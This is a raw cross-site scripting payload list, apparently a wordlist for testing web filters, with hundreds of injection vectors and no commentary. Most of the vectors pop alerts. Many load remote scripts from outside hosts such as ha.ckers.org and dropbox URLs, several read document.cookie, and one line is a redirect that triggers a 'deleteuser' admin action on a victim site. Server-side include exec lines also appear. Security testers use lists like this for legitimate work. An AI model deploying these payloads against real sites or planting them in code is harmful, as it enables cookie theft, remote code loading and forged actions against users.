<FRAMESET><FRAME SRC="javascript:javascript:alert(1);"></FRAMESET> | |
<BODY ONLOAD=javascript:alert(1)> | |
<BODY ONLOAD=javascript:javascript:alert(1)> | |
<IMG SRC="jav ascript:javascript:alert(1);"> | |
<BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1)> | |
<SCRIPT/SRC="%(jscript)s"></SCRIPT> | |
<<SCRIPT>%(payload)s//<</SCRIPT> | |
<IMG SRC="javascript:javascript:alert(1)" | |
<iframe src=%(scriptlet)s < | |
<INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(1);"> | |
<IMG DYNSRC="javascript:javascript:alert(1)"> | |
<IMG LOWSRC="javascript:javascript:alert(1)"> | |
<BGSOUND SRC="javascript:javascript:alert(1);"> | |
<BR SIZE="&{javascript:alert(1)}"> | |
<LAYER SRC="%(scriptlet)s"></LAYER> | |
<LINK REL="stylesheet" HREF="javascript:javascript:alert(1);"> | |
<STYLE>@import'%(css)s';</STYLE> | |
<META HTTP-EQUIV="Link" Content="<%(css)s>; REL=stylesheet"> | |
<XSS STYLE="behavior: url(%(htc)s);"> | |
<STYLE>li {list-style-image: url("javascript:javascript:alert(1)");}</STYLE><UL><LI>XSS | |
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(1);"> | |
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(1);"> | |
<IFRAME SRC="javascript:javascript:alert(1);"></IFRAME> | |
<TABLE BACKGROUND="javascript:javascript:alert(1)"> | |
<TABLE><TD BACKGROUND="javascript:javascript:alert(1)"> | |
<DIV STYLE="background-image: url(javascript:javascript:alert(1))"> | |
<DIV STYLE="width:expression(javascript:alert(1));"> | |
<IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(1))"> | |
<XSS STYLE="xss:expression(javascript:alert(1))"> | |
<STYLE TYPE="text/javascript">javascript:alert(1);</STYLE> | |
<STYLE>.XSS{background-image:url("javascript:javascript:alert(1)");}</STYLE><A CLASS=XSS></A> | |
<STYLE type="text/css">BODY{background:url("javascript:javascript:alert(1)")}</STYLE> | |
<!--[if gte IE 4]><SCRIPT>javascript:alert(1);</SCRIPT><![endif]--> | |
<BASE HREF="javascript:javascript:alert(1);//"> | |
<OBJECT TYPE="text/x-scriptlet" DATA="%(scriptlet)s"></OBJECT> | |
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:javascript:alert(1)></OBJECT> | |
<HTML xmlns:xss><?import namespace="xss" implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:javascript:alert(1)"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> | |
<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>javascript:alert(1)</SCRIPT>"></BODY></HTML> | |
<SCRIPT SRC="%(jpg)s"></SCRIPT> | |
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4- | |
<form id="test" /><button form="test" formaction="javascript:javascript:alert(1)">X | |
<body onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus> | |
<P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(1)"> | |
<STYLE>@import'%(css)s';</STYLE> | |
<STYLE>a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}</STYLE> | |
<meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&> | |
<SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT> | |
<style onreadystatechange=javascript:javascript:alert(1);></style> | |
<?xml version="1.0"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(1);</html:script></html:html> | |
<embed code=%(scriptlet)s></embed> | |
<embed code=javascript:javascript:alert(1);></embed> | |
<embed src=%(jscript)s></embed> | |
<frameset onload=javascript:javascript:alert(1)></frameset> | |
<object onerror=javascript:javascript:alert(1)> | |
<embed type="image" src=%(scriptlet)s></embed> | |
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(1);">]]</C><X></xml> | |
<IMG SRC=&{javascript:alert(1);};> | |
<a href="javAascript:javascript:alert(1)">test1</a> | |
<a href="javaascript:javascript:alert(1)">test1</a> | |
<embed width=500 height=500 code="data:text/html,<script>%(payload)s</script>"></embed> | |
<iframe srcdoc="<iframe/srcdoc=&lt;img/src=&apos;&apos;onerror=javascript:alert(1)&gt;>"> | |
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//"; | |
alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-- | |
></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> | |
'';!--"<XSS>=&{()} | |
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> | |
<IMG SRC="javascript:alert('XSS');"> | |
<IMG SRC=javascript:alert('XSS')> | |
<IMG SRC=JaVaScRiPt:alert('XSS')> | |
<IMG SRC=javascript:alert("XSS")> | |
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> | |
<a onmouseover="alert(document.cookie)">xxs link</a> | |
<a onmouseover=alert(document.cookie)>xxs link</a> | |
<IMG """><SCRIPT>alert("XSS")</SCRIPT>"> | |
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> | |
<IMG SRC=# onmouseover="alert('xxs')"> | |
<IMG SRC= onmouseover="alert('xxs')"> | |
<IMG onmouseover="alert('xxs')"> | |
<IMG SRC=javascript:alert('XSS')> | |
<IMG SRC=javascript:alert('XSS')> | |
<IMG SRC=javascript:alert('XSS')> | |
<IMG SRC="jav ascript:alert('XSS');"> | |
<IMG SRC="jav	ascript:alert('XSS');"> | |
<IMG SRC="jav
ascript:alert('XSS');"> | |
<IMG SRC="jav
ascript:alert('XSS');"> | |
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out | |
<IMG SRC="  javascript:alert('XSS');"> | |
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> | |
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<<SCRIPT>alert("XSS");//<</SCRIPT> | |
<SCRIPT SRC=http://ha.ckers.org/xss.js?< B > | |
<SCRIPT SRC=//ha.ckers.org/.j> | |
<IMG SRC="javascript:alert('XSS')" | |
<iframe src=http://ha.ckers.org/scriptlet.html < | |
\";alert('XSS');// | |
</TITLE><SCRIPT>alert("XSS");</SCRIPT> | |
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> | |
<BODY BACKGROUND="javascript:alert('XSS')"> | |
<IMG DYNSRC="javascript:alert('XSS')"> | |
<IMG LOWSRC="javascript:alert('XSS')"> | |
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br> | |
<IMG SRC='vbscript:msgbox("XSS")'> | |
<IMG SRC="livescript:[code]"> | |
<BODY ONLOAD=alert('XSS')> | |
<BGSOUND SRC="javascript:alert('XSS');"> | |
<BR SIZE="&{alert('XSS')}"> | |
<LINK REL="stylesheet" HREF="javascript:alert('XSS');"> | |
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> | |
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> | |
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> | |
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> | |
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> | |
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> | |
exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'> | |
<STYLE TYPE="text/javascript">alert('XSS');</STYLE> | |
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> | |
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> | |
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> | |
<XSS STYLE="xss:expression(alert('XSS'))"> | |
<XSS STYLE="behavior: url(xss.htc);"> | |
¼script¾alert(¢XSS¢)¼/script¾ | |
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> | |
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> | |
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> | |
<IFRAME SRC="javascript:alert('XSS');"></IFRAME> | |
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME> | |
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> | |
<TABLE BACKGROUND="javascript:alert('XSS')"> | |
<TABLE><TD BACKGROUND="javascript:alert('XSS')"> | |
<DIV STYLE="background-image: url(javascript:alert('XSS'))"> | |
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> | |
<DIV STYLE="background-image: url(javascript:alert('XSS'))"> | |
<DIV STYLE="width: expression(alert('XSS'));"> | |
<BASE HREF="javascript:alert('XSS');//"> | |
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> | |
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED> | |
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT> | |
<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"--> | |
<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?> | |
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"> | |
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser | |
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>"> | |
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- | |
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<A HREF="http://66.102.7.147/">XSS</A> | |
<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A> | |
<A HREF="http://1113982867/">XSS</A> | |
<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A> | |
<A HREF="http://0102.0146.0007.00000223/">XSS</A> | |
<A HREF="htt p://6 6.000146.0x7.147/">XSS</A> | |
<iframe %00 src="	javascript:prompt(1)	"%00> | |
<svg><style>{font-family:'<iframe/onload=confirm(1)>' | |
<input/onmouseover="javaSCRIPT:confirm(1)" | |
<sVg><scRipt %00>alert(1) {Opera} | |
<img/src=`%00` onerror=this.onerror=confirm(1) | |
<form><isindex formaction="javascript:confirm(1)" | |
<img src=`%00`
 onerror=alert(1)
 | |
<script/	 src='https://dl.dropbox.com/u/13018058/js.js' /	></script> | |
<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=? | |
<iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="> | |
<script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/ | |
"><h1/onmouseover='\u0061lert(1)'>%00 | |
<iframe/src="data:text/html,<svg onload=alert(1)>"> | |
<meta content="
 1 
; JAVASCRIPT: alert(1)" http-equiv="refresh"/> | |
<svg><script xlink:href=data:,window.open('https://www.google.com/')></script | |
<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera} | |
<meta http-equiv="refresh" content="0;url=javascript:confirm(1)"> | |
<iframe src=javascript:alert(document.location)> | |
<form><a href="javascript:\u0061lert(1)">X | |
</script><img/*%00/src="worksinchrome:prompt(1)"/%00*/onerror='eval(src)'> | |
<img/	  src=`~` onerror=prompt(1)> | |
<form><iframe 	  src="javascript:alert(1)" 	;> | |
<a href="data:application/x-x509-user-cert;
base64
,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="	 >X</a | |
http://www.google<script .com>alert(document.location)</script | |
<a href=[�]"� onmouseover=prompt(1)//">XYZ</a | |
<img/src=@  onerror = prompt('1') | |
<style/onload=prompt('XSS') | |
<script ^__^>alert(String.fromCharCode(49))</script ^__^ | |
</style  ><script   :-(>/**/alert(document.location)/**/</script   :-( | |
�</form><input type="date" onfocus="alert(1)"> | |
<form><textarea onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'> | |
<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/ | |
<iframe srcdoc='<body onload=prompt(1)>'> | |
<a href="javascript:void(0)" onmouseover=
javascript:alert(1)
>X</a> | |
<script ~~~>alert(0%0)</script ~~~> | |
<style/onload=<!--	> alert (1)> | |
<///style///><span %2F onmousemove='alert(1)'>SPAN | |
<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=	prompt(1) | |
"><svg><style>{-o-link-source:'<body/onload=confirm(1)>' | |
<blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera} | |
<marquee onstart='javascript:alert(1)'>^__^ | |
<div/style="width:expression(confirm(1))">X</div> {IE7} | |
<iframe/%00/ src=javaSCRIPT:alert(1) | |
//<form/action=javascript:alert(document.cookie)><input/type='submit'>// | |
/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/> | |
//|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\ | |
</font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style> | |
<a/href="javascript: javascript:prompt(1)"><input type="X"> | |
</plaintext\></|\><plaintext/onmouseover=prompt(1) | |
</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1) {Opera} | |
<a href="javascript:\u0061le%72t(1)"><button> | |
<div onmouseover='alert(1)'>DIV</div> | |
<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)"> | |
<a href="jAvAsCrIpT:alert(1)">X</a> | |
<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> | |
<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> | |
<var onmouseover="prompt(1)">On Mouse Over</var> | |
<a href=javascript:alert(document.cookie)>Click Here</a> | |
<img src="/" =_=" title="onerror='prompt(1)'"> | |
<%<!--'%><script>alert(1);</script --> | |
<script src="data:text/javascript,alert(1)"></script> | |
<iframe/src \/\/onload = prompt(1) | |
<iframe/onreadystatechange=alert(1) | |
<svg/onload=alert(1) | |
<input value=<><iframe/src=javascript:confirm(1) | |
<input type="text" value=`` <div/onmouseover='alert(1)'>X</div> | |
http://www.<script>alert(1)</script .com | |
<iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															28
																1
																	%29></iframe> | |
<svg><script ?>alert(1) | |
<iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe> | |
<img src=`xx:xx`onerror=alert(1)> | |
<object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object> | |
<meta http-equiv="refresh" content="0;javascript:alert(1)"/> | |
<math><a xlink:href="//jsfiddle.net/t846h/">click | |
<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always> | |
<svg contentScriptType=text/vbs><script>MsgBox+1 | |
<a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a | |
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE> | |
<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+ | |
<script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F | |
<script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script | |
<object data=javascript:\u0061le%72t(1)> | |
<script>+-+-1-+-+alert(1)</script> | |
<body/onload=<!-->
alert(1)> | |
<script itworksinallbrowsers>/*<script* */alert(1)</script | |
<img src ?itworksonchrome?\/onerror = alert(1) | |
<svg><script>//
confirm(1);</script </svg> | |
<svg><script onlypossibleinopera:-)> alert(1) | |
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe | |
<script x> alert(1) </script 1=2 | |
<div/onmouseover='alert(1)'> style="x:"> | |
<--`<img/src=` onerror=alert(1)> --!> | |
<script/src=data:text/javascript,alert(1)></script> | |
<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button> | |
"><img src=x onerror=window.open('https://www.google.com/');> | |
<form><button formaction=javascript:alert(1)>CLICKME | |
<math><a xlink:href="//jsfiddle.net/t846h/">click | |
<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object> | |
<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe> | |
<a href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click Me</a> | |
%253Cscript%253Ealert('XSS')%253C%252Fscript%253E | |
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onoffline="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onpagehide="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onpageshow="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onpopstate="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onresize="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onstorage="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onunload="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onblur="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onchange="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x oncontextmenu="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x oninput="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x oninvalid="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onreset="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onsearch="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onselect="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onsubmit="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onkeydown="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onkeypress="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onkeyup="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onclick="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x ondblclick="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onmousedown="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onmousemove="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onmouseout="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onmouseover="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onmouseup="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onmousewheel="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onwheel="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x ondrag="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x ondragend="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x ondragenter="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x ondragleave="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x ondragover="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x ondragstart="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x ondrop="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onscroll="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x oncopy="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x oncut="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onpaste="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onabort="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x oncanplay="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x oncanplaythrough="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x oncuechange="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x ondurationchange="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onemptied="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onended="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onloadeddata="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onloadedmetadata="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onloadstart="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onpause="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onplay="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onplaying="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onprogress="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onratechange="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onseeked="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onseeking="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onstalled="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onsuspend="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x ontimeupdate="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onvolumechange="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onwaiting="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x onshow="alert(String.fromCharCode(88,83,83))"> | |
<IMG SRC=x ontoggle="alert(String.fromCharCode(88,83,83))"> | |
<META onpaonpageonpagonpageonpageshowshoweshowshowgeshow="alert(1)"; | |
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> | |
<INPUT TYPE="BUTTON" action="alert('XSS')"/> | |
"><h1><IFRAME SRC="javascript:alert('XSS');"></IFRAME>">123</h1> | |
"><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1> | |
<IFRAME SRC="javascript:alert('XSS');"></IFRAME> | |
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME> | |
"><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1> | |
"></iframe><script>alert(`TEXT YOU WANT TO BE DISPLAYED`);</script><iframe frameborder="0%EF%BB%BF | |
"><h1><IFRAME width="420" height="315" SRC="http://www.youtube.com/embed/sxvccpasgTE" frameborder="0" onmouseover="alert(document.cookie)"></IFRAME>123</h1> | |
"><h1><iframe width="420" height="315" src="http://www.youtube.com/embed/sxvccpasgTE" frameborder="0" allowfullscreen></iframe>123</h1> | |
><h1><IFRAME width="420" height="315" frameborder="0" onmouseover="document.location.href='https://www.youtube.com/channel/UC9Qa_gXarSmObPX3ooIQZr | |
g'"></IFRAME>Hover the cursor to the LEFT of this Message</h1>&ParamHeight=250 | |
<IFRAME width="420" height="315" frameborder="0" onload="alert(document.cookie)"></IFRAME> | |
"><h1><IFRAME SRC="javascript:alert('XSS');"></IFRAME>">123</h1> | |
"><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1> | |
<iframe src=http://xss.rocks/scriptlet.html < | |
<IFRAME SRC="javascript:alert('XSS');"></IFRAME> | |
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME> | |
<iframe src="	javascript:prompt(1)	"> | |
<svg><style>{font-family:'<iframe/onload=confirm(1)>' | |
<input/onmouseover="javaSCRIPT:confirm(1)" | |
<sVg><scRipt >alert(1) {Opera} | |
<img/src=`` onerror=this.onerror=confirm(1) | |
<form><isindex formaction="javascript:confirm(1)" | |
<img src=``
 onerror=alert(1)
 | |
<script/	 src='https://dl.dropbox.com/u/13018058/js.js' /	></script> | |
<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=? | |
<iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="> | |
<script /**/>/**/alert(1)/**/</script /**/ | |
"><h1/onmouseover='\u0061lert(1)'> | |
<iframe/src="data:text/html,<svg onload=alert(1)>"> | |
<meta content="
 1 
; JAVASCRIPT: alert(1)" http-equiv="refresh"/> | |
<svg><script xlink:href=data:,window.open('https://www.google.com/') </script | |
<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera} | |
<meta http-equiv="refresh" content="0;url=javascript:confirm(1)"> | |
<iframe src=javascript:alert(document.location)> | |
<form><a href="javascript:\u0061lert(1)">X</script><img/*/src="worksinchrome:prompt(1)"/*/onerror='eval(src)'> | |
<img/	  src=`~` onerror=prompt(1)> | |
<form><iframe 	  src="javascript:alert(1)" 	;> | |
<a href="data:application/x-x509-user-cert;
base64
,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="	 >X</a | |
http://www.google<script .com>alert(document.location)</script | |
<a href=[�]"� onmouseover=prompt(1)//">XYZ</a | |
<img/src=@  onerror = prompt('1') | |
<style/onload=prompt('XSS') | |
<script ^__^>alert(String.fromCharCode(49))</script ^__^ | |
</style  ><script   :-(>/**/alert(document.location)/**/</script   :-( | |
�</form><input type="date" onfocus="alert(1)"> | |
<form><textarea onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'> | |
<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/ | |
<iframe srcdoc='<body onload=prompt(1)>'> | |
<a href="javascript:void(0)" onmouseover=
javascript:alert(1)
>X</a> | |
<script ~~~>alert(0%0)</script ~~~> | |
<style/onload=<!--	> alert (1)> | |
<///style///><span %2F onmousemove='alert(1)'>SPAN | |
<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=	prompt(1) | |
"><svg><style>{-o-link-source:'<body/onload=confirm(1)>' | |
<blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera} | |
<marquee onstart='javascript:alert(1)'>^__^ | |
<div/style="width:expression(confirm(1))">X</div> {IE7} | |
<iframe// src=javaSCRIPT:alert(1) | |
//<form/action=javascript:alert(document.cookie)><input/type='submit'>// | |
/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/> | |
//|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\ | |
</font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style> | |
<a/href="javascript: javascript:prompt(1)"><input type="X"> | |
</plaintext\></|\><plaintext/onmouseover=prompt(1) | |
